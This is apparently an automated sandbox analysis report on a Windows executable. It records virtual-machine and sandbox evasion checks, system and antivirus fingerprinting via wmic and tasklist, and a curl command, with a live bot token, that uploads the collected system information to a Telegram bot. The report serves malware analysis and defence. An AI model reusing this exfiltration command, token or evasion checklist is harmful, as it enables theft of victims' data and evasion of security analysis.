Source: 9KEZfGRjyK.exeBinary or memory string: defaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: adminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000003.1789165083.000001D7126FA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000002.1789681464.000001D7126FC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1789092020.000001D7126E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxtray.exe
Source: 9KEZfGRjyK.exeBinary or memory string: LisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000003.1785347832.000001F9D2FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'A
Source: 9KEZfGRjyK.exeBinary or memory string: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1785611901.000001F9D2F90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
Source: 9KEZfGRjyK.exeBinary or memory string: api_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystem
Source: tasklist.exe, 00000026.00000002.1789681464.000001D7126FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: sandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1787805517.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxservice.exe/
Source: tasklist.exe, 00000022.00000003.1785347832.000001F9D2FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: BrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: abbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: AdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1734307321.000001DBD424A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734238940.000001DBD4248000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD424B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport65
Source: tasklist.exe, 00000024.00000002.1787932928.000002173DBC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'
Source: system_info.txt.0.drBinary or memory string: - vmtoolsd.exe
Source: 9KEZfGRjyK.exeBinary or memory string: Georgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: georgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1734488419.000001DBD421F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD420C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD4221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWP
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: AlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1787694674.000002173DA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxservice.exe"
Source: tasklist.exe, 00000026.00000002.1789528173.000001D712665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'PRO1t~eU@
Source: tasklist.exe, 00000024.00000003.1787316251.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA
Source: getmac.exe, 0000000D.00000003.1734488419.000001DBD421F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD424A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734238940.000001DBD4248000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD420C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD424B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: tasklist.exe, 00000024.00000002.1787694674.000002173DA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vboxservice.exe"C:\Windows\system32\tasklist.exeWinsta0\Default
Source: tasklist.exe, 00000022.00000002.1785776288.000001F9D3255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'PRO
Source: 9KEZfGRjyK.exeBinary or memory string: VMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126ED000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1789092020.000001D7126E8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1789241974.000001D7126ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: , ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'0
Source: 9KEZfGRjyK.exeBinary or memory string: vboxtray.exeIMAGENAME eq
Source: tasklist.exe, 00000022.00000002.1785692557.000001F9D2FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vmtoolsd.exe
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422724790.0000026594338000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: 9KEZfGRjyK.exeBinary or memory string: wpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1785692557.000001F9D2FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: curl.exe, 0000002D.00000003.2422964793.00000265942F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 9KEZfGRjyK.exeBinary or memory string: fredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1787932928.000002173DBC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxservice.exel\Te
Source: 9KEZfGRjyK.exeBinary or memory string: vboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: harry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1785692557.000001F9D2FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vmtoolsd.exee9
Source: tasklist.exe, 00000022.00000002.1785692557.000001F9D2FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: brunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000002.1789528173.000001D712660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxtray.exea\Local\Te
Source: tasklist.exe, 00000024.00000002.1787805517.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: , ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'0
Source: 9KEZfGRjyK.exeBinary or memory string: vtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: FredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1785776288.000001F9D3250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vmtoolsd.exea\Local\Te
Source: getmac.exe, 0000000D.00000003.1734307321.000001DBD424A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734238940.000001DBD4248000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD424B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'U
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxtray.exe"
Source: 9KEZfGRjyK.exeBinary or memory string: HYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1787805517.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxservice.exe^P
Source: tasklist.exe, 00000022.00000002.1785692557.000001F9D2FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: 9KEZfGRjyK.exeBinary or memory string: rootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: QEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000003.1789165083.000001D7126FA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000002.1789681464.000001D7126FC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1789092020.000001D7126E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxtray.exe
Source: 9KEZfGRjyK.exeBinary or memory string: vmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000003.1789165083.000001D7126FA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1789092020.000001D7126E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE');
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F4139174 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F4139174
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F412AA60 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,0_2_00007FF7F412AA60
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411E030 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF7F411E030
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F4139174 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F4139174
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F4139318 SetUnhandledExceptionFilter,0_2_00007FF7F4139318
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F413C07C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7F413C07C
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get nameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemoryJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,sizeJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayNameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\getmac.exe "getmac"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get modelJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=284330-4180-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentJump to behavior
Source: C:\Windows\System32\curl.exeQueries volume information: C:\Users\user\Desktop\system_info.txt VolumeInformation
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411FDF0 ProcessPrng,GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,ProcessPrng,0_2_00007FF7F411FDF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F413904C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7F413904C
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F410DA70 GetTimeZoneInformationForYear,0_2_00007FF7F410DA70
Source: C:\Windows\System32\curl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts341
Windows Management Instrumentation		1
DLL Side-Loading		12
Process Injection		1
Masquerading		OS Credential Dumping2
System Time Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		Boot or Logon Initialization Scripts1
DLL Side-Loading		33
Virtualization/Sandbox Evasion		LSASS Memory461
Security Software Discovery		Remote Desktop ProtocolData from Removable Media21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Disable or Modify Tools		Security Account Manager33
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Process Injection		NTDS2
Process Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information		Cached Domain Credentials135
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578571 Sample: 9KEZfGRjyK.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 68 35 api.telegram.org 2->35 41 Machine Learning detection for sample 2->41 43 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->43 8 9KEZfGRjyK.exe 1 2->8         started        signatures3 45 Uses the Telegram API (likely for C&C communication) 35->45 process4 signatures5 47 Contain functionality to detect virtual machines 8->47 49 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->49 11 getmac.exe 1 8->11         started        14 WMIC.exe 1 8->14         started        16 systeminfo.exe 2 1 8->16         started        18 18 other processes 8->18 process6 dnsIp7 51 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->51 53 Writes or reads registry keys via WMI 11->53 21 conhost.exe 11->21         started        55 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->55 23 conhost.exe 14->23         started        25 conhost.exe 16->25         started        37 api.telegram.org 149.154.167.220, 443, 49770 TELEGRAMRU United Kingdom 18->37 39 127.0.0.1 unknown unknown 18->39 57 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->57 27 conhost.exe 18->27         started        29 conhost.exe 18->29         started        31 conhost.exe 18->31         started        33 15 other processes 18->33 signatures8 process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
9KEZfGRjyK.exe5%ReversingLabs
9KEZfGRjyK.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.telegram.org
149.154.167.220
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentfalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument&curl.exe, 0000002D.00000002.2423334465.00000265942FF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422919071.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422937156.00000265942FE000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentC:curl.exe, 0000002D.00000002.2423255293.00000265942E0000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentccurl.exe, 0000002D.00000002.2423255293.00000265942E0000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o.txt99KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
